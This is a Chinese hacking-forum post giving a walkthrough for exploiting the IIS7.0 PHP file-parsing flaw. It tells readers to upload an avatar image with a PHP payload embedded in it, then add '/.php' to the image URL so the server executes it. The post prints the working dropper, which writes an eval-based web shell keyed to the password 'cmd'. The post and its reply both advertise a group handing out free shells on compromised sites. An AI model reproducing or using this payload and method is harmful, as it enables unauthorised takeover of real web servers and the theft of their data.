请选择 进入手机版 | 继续访问电脑版

IIS7.0 php错误文件解析漏洞利用实例

[复制链接]
查看293 | 回复1 | 2021-5-18 17:06:36 | 显示全部楼层 |阅读模式
IIS7.0 php错误文件解析漏洞利用实例 Author: lenhook / Category:  [技术文章] www.lenhook.com/robots.txt后面加上/任意字符.php成功解析为php
Default.aspx/.php
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
<?fputs(fopen(len.php,w),<?eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成len.php
shell交流群:828250245 免费领取shell
回复

使用道具 举报

天空 | 2021-5-18 17:06:52 | 显示全部楼层
shell交流群:828250245 免费领取shell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

97

主题

99

帖子

739

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
739